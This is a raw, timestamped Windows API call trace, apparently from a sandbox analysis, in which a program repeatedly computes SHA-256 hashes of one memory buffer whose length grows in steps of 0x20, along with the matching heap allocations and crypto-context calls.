	[0153.497] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305578
	[0153.497] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305578, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305578, pdwDataLen=0x128aac) returned 1
	[0153.497] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.497] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.497] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.497] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.497] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0153.497] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.497] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23055a0
	[0153.497] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23055a0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23055a0, pdwDataLen=0x128aac) returned 1
	[0153.497] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.497] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.497] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.498] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.498] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0153.498] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.498] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23055c8
	[0153.498] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23055c8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23055c8, pdwDataLen=0x128aac) returned 1
	[0153.498] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.498] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.498] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.498] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.498] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0153.498] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.498] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23055f0
	[0153.498] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23055f0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23055f0, pdwDataLen=0x128aac) returned 1
	[0153.498] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.498] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.498] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.499] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.499] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0153.499] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.499] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305618
	[0153.499] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305618, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305618, pdwDataLen=0x128aac) returned 1
	[0153.499] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.499] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.499] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.499] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.499] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0153.499] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.499] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305640
	[0153.499] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305640, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305640, pdwDataLen=0x128aac) returned 1
	[0153.499] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.499] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.499] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.500] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.500] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0153.500] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.500] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305668
	[0153.500] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305668, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305668, pdwDataLen=0x128aac) returned 1
	[0153.500] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.500] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.500] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.500] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.500] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0153.500] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.500] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305690
	[0153.500] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305690, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305690, pdwDataLen=0x128aac) returned 1
	[0153.500] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.500] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.500] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.501] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.501] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0153.501] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.501] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23056b8
	[0153.501] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23056b8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23056b8, pdwDataLen=0x128aac) returned 1
	[0153.501] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.501] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.501] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.501] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.501] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0153.501] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.501] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23056e0
	[0153.502] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23056e0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23056e0, pdwDataLen=0x128aac) returned 1
	[0153.502] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.502] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.502] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.502] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.502] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0153.502] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.502] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305708
	[0153.502] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305708, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305708, pdwDataLen=0x128aac) returned 1
	[0153.502] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.502] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.502] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.503] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.503] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0153.503] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.503] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305730
	[0153.503] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305730, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305730, pdwDataLen=0x128aac) returned 1
	[0153.503] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.503] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.503] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.503] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.503] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0153.503] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.503] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305758
	[0153.503] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305758, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305758, pdwDataLen=0x128aac) returned 1
	[0153.503] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.503] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.503] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.504] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.504] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0153.504] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.504] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305780
	[0153.504] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305780, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305780, pdwDataLen=0x128aac) returned 1
	[0153.504] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.504] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.504] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.504] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.504] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0153.504] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.504] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23057a8
	[0153.504] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23057a8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23057a8, pdwDataLen=0x128aac) returned 1
	[0153.504] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.504] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.504] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.505] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.505] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0153.505] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.505] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23057d0
	[0153.505] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23057d0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23057d0, pdwDataLen=0x128aac) returned 1
	[0153.505] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.505] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.505] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.505] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.505] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0153.505] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.505] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23057f8
	[0153.505] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23057f8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23057f8, pdwDataLen=0x128aac) returned 1
	[0153.505] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.506] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.506] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.506] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.506] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0153.506] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.506] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305820
	[0153.506] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305820, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305820, pdwDataLen=0x128aac) returned 1
	[0153.506] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.506] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.506] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.506] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.507] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0153.507] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.507] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305848
	[0153.507] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305848, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305848, pdwDataLen=0x128aac) returned 1
	[0153.507] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.507] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.507] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.507] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.507] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0153.507] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.507] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305870
	[0153.507] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305870, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305870, pdwDataLen=0x128aac) returned 1
	[0153.507] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.507] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.507] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.508] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.508] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0153.508] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.508] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305898
	[0153.508] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305898, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305898, pdwDataLen=0x128aac) returned 1
	[0153.508] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.508] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.508] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.508] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.508] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0153.508] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.508] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23058c0
	[0153.508] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23058c0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23058c0, pdwDataLen=0x128aac) returned 1
	[0153.508] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.508] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.508] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.509] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.509] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0153.509] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.509] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23058e8
	[0153.509] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23058e8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23058e8, pdwDataLen=0x128aac) returned 1
	[0153.509] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.509] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.509] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.509] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.509] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0153.509] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.509] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305910
	[0153.509] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305910, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305910, pdwDataLen=0x128aac) returned 1
	[0153.509] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.509] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.509] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.510] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.510] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0153.510] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.510] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305938
	[0153.510] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305938, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305938, pdwDataLen=0x128aac) returned 1
	[0153.510] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.510] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.510] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.510] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.510] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0153.510] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.510] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305960
	[0153.510] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305960, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305960, pdwDataLen=0x128aac) returned 1
	[0153.510] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.510] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
